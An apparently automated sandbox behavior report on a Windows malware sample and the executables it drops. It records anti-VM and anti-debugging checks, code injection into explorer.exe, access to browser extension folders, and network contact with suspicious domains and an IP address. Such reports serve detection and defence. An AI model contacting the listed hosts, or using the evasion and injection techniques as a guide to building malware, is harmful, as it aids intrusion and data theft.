Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: thduhcf, 00000005.00000002.575593576.0000000000862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKW
Source: file.exe, 00000000.00000002.431534613.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKZ

Source: C:\Users\user\AppData\Local\Temp\8C19.exe

RDTSC instruction interceptor: First address: 00000001405B10DA second address: 00000001405B10E3 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 dec ecx 0x00000004 movzx eax, dx 0x00000007 cwd 0x00000009 rdtsc

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI			Jump to behavior

Source: C:\Windows\explorer.exe TID: 1380	Thread sleep count: 650 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 1236	Thread sleep count: 234 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 1248	Thread sleep count: 181 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 3376	Thread sleep count: 519 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 2880	Thread sleep count: 104 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 1332	Thread sleep count: 67 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 2004	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 4740	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8C19.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 650			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 519			Jump to behavior

Source: C:\Windows\explorer.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7AF0.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_0092771C rdtsc

4_2_0092771C

Source: C:\Users\user\AppData\Local\Temp\8C19.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,

4_2_00404AE9

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\			Jump to behavior

Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.370625735.00000000043B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 6246.exe, 00000008.00000002.538446381.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[{i4
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.421056906.00000000087F4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,

4_2_004049EA

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C59F5 push dword ptr fs:[00000030h]		0_2_008C59F5
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_009260A3 push dword ptr fs:[00000030h]		4_2_009260A3

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_00409947

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_0092771C rdtsc

4_2_0092771C

Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00409085 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,MoveFileA,GetLastError,__dosmaperr,		4_2_00409085
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00409947 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_00409947
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0040B33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_0040B33B
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00409D7C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_00409D7C
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0041165B SetUnhandledExceptionFilter,		4_2_0041165B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Domain query: github.com
Source: C:\Windows\explorer.exe	Domain query: dldsystem.com
Source: C:\Windows\explorer.exe	Domain query: furubujjul.net
Source: C:\Windows\explorer.exe	Domain query: pelegisr.com
Source: C:\Windows\explorer.exe	Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe	Network Connect: 185.174.137.174 80			Jump to behavior

Source: C:\Windows\explorer.exe

File created: idduhcf.1.dr

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Memory written: C:\Users\user\AppData\Local\Temp\6246.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 5261ACC			Jump to behavior
Source: C:\Users\user\AppData\Roaming\thduhcf	Thread created: unknown EIP: 5361ACC			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Thread created: unknown EIP: 5321A80			Jump to behavior

Source: C:\Windows\explorer.exe

Memory written: C:\Windows\SysWOW64\explorer.exe base: A2F380

Jump to behavior

Source: C:\Windows\explorer.exe	Memory written: PID: 6040 base: A2F380 value: 90			Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6076 base: 7FF69BD28150 value: 90			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Process created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe

Jump to behavior

Source: explorer.exe, 00000001.00000000.419226663.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.411309802.0000000005910000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.319218713.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.403872443.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.368088289.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.367436647.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.402857693.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318909618.0000000000878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanLoc*U

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		0_2_00418C46
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,		0_2_0040A84C
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,		0_2_004138F3
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,		0_2_00412A30
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		0_2_00413285
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,		4_2_0040A85C
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,		4_2_004140C6
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,		4_2_0041415E
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,		4_2_00413903
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoA,		4_2_0040D104
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,		4_2_004141D2
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,		4_2_00412A40
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,		4_2_00418AE3
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		4_2_00413295
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,		4_2_00413B5B
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,		4_2_00418B17
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,		4_2_004143A4
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		4_2_00418C56
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,		4_2_00414465
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,		4_2_004144CC
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoA,		4_2_00412563
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,		4_2_00414508
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,		4_2_00418DF3
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,		4_2_00413FAF

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_00411DEA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_00411DEA

Stealing of Sensitive Information

Source: Yara match

File source: dump.pcap, type: PCAP

Source: Yara match	File source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
